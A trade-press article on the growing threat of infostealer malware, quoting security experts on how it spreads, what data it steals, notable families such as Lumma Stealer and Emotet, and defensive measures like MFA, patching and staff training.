Infostealers have been around for some time but recently they’ve been making headlines. This targeted malware, created to compromise the systems of victims and exfiltrate sensitive information, is on the rise and poses an active threat to all businesses.
A recent report found that infostealers exposed billions of credentials in 2024, with KELA Cyber Threat Intelligence measuring 4.3 million machines infected with the malware around the world.
Infostealers were used in headline-grabbing attacks in the past year such as the Snowflake data breach and sometimes come as a precursor to ransomware attacks.
So how big is the threat posed by infostealers and what needs to be done to protect against them?
Infostealers at work
Infostealers are malicious programs designed to extract sensitive data, such as passwords, session cookies and authentication tokens. Their goal is clear: to gain access to accounts, platforms or corporate networks, says Axel Maisonneuve, technical education contributor at BSV Association.
He calls infostealers “highly effective” due to their “small size, speed and ability to operate stealthily” – which means they often go undetected.
Infostealers typically arrive via phishing emails, compromised URLs, infected downloads, or flaws in software operating systems, Kevin Curran, IEEE senior member and professor of cybersecurity at Ulster University explains.
“Once on the device, the malware looks for certain kinds of information, including browser passwords, autofill data such as credit card numbers and addresses, cryptocurrency wallet data, system data and session cookies for accounts currently logged in. After collecting the information, the malware sends the data to an attacker-controlled server, or makes it available for download.”
Once extracted, the stolen data is often packaged up and sold on an auto shop – a dark web marketplace that specializes in the sale of digital products – for a relatively small price.
However, particularly valuable stolen data can be sold for several hundred dollars, says Robert Fitzsimons, lead threat intelligence engineer at Searchlight Cyber. “Similarly, information can be disseminated on platforms including Telegram and dark web hacker forums to be used by other threat actors such as ransomware groups during the reconnaissance phase of further attacks.”
Infostealers are now widely accessible thanks to the rise of the malware as a service (MaaS) model, says Maisonneuve. “Platforms such as Raccoon Stealer and Redline are available via subscription in underground forums, while advanced persistent threat (APT) groups use them for large-scale espionage.”
Infostealer examples
One of the most well-known examples of an infostealer is Emotet, which initially started as a banking Trojan but evolved into a powerful infostealing tool. “Emotet’s capabilities have enabled large-scale ransomware operations, making it infamous in the cybersecurity landscape,” says Dray Agha, senior manager of security operations at Huntress.
Another emerging example is Lumma Stealer, a more recent malware variant. “Lumma Stealer is notable for its ability to capture information related to multi-factor authentication (MFA), undermining critical layers of security and leaving victims exposed to further attacks,” Agha explains.
An increasing number of infostealer campaigns are leveraging fake CAPTCHA pages to deliver Lumma Stealer malware, says Stefan Tenase, cyber intelligence expert at CSIS. “While thinking they are solving a CAPTCHA to prove they are human, victims are duped into pasting malicious PowerShell code into their systems, showcasing how simple yet effective social engineering tactics can be.”
John Flatley, consulting solutions architect at Barracuda describes how the firm recently observed a phishing campaign delivering a sophisticated infostealer capable of collecting extensive data, including browser session cookies, saved credit card details, cryptocurrency wallet extensions and PDF files. “The attack started with a phishing email and unfolded in stages to finally reveal the obfuscated infostealer malware.
“Once deployed, the infostealer exfiltrated the sensitive information to attacker-controlled email accounts for selling onwards, or for financial theft or lateral movement within an organization.”
Prashant Kumar, X-Labs security researcher at Forcepoint describes how the firm’s research teams have seen increased activity from a new infostealer targeting businesses called VIPKeyLogger, which circulates through phishing campaigns as an attachment. “Opening the attachment leads to a sequence of events that ultimately ends up with data exfiltration such as recording keystrokes and collecting information including clipboard data, screenshots and browser history.”
Another campaign circulated in the holiday season was the Rhadamanthys stealer, which masquerades as travel industry emails, says Kumar. “Clicking the documents triggers a chain of downloads and obfuscated scripts to steal user credentials and cryptocurrency wallet data.”
Protecting your business from infostealers
The threat from infostealers is growing, but thankfully, there are tools and techniques to avoid being hit.
Defending against infostealers requires a comprehensive approach to cybersecurity, emphasizing preventative measures and advanced tools, says Agha. One critical part of this is security awareness training, which helps employees recognize and avoid common attack methods such as phishing attempts and malicious links, he says.
It's also important to use antivirus and anti-malware solutions with real-time scanning capabilities, says Curran. “These act to detect and block malware, including spyware and keyloggers.”
Trusted password managers are “essential for generating and securely storing strong, unique passwords”, he says. However, he warns that storing passwords directly in browsers can make them vulnerable to infostealer attacks.
Once they're inside your organization, infostealers can be difficult to spot. With this in mind, Fitzsimons advises monitoring dark web forums for stolen data logs related to your company. “This means you can more easily identify the compromised device, where the infostealer is installed and when it was infected. You can then take quick action to contain its spread within your network.”
Keeping software and systems up to date is also important to avoid being impacted by infostealers, says Agha. “Regular updates and patching help close the vulnerabilities attackers often exploit to deploy malware. Additionally, implementing strong authentication practices, such as MFA, adds an extra layer of security. Even if login credentials are compromised, MFA can prevent unauthorized access to critical systems.”
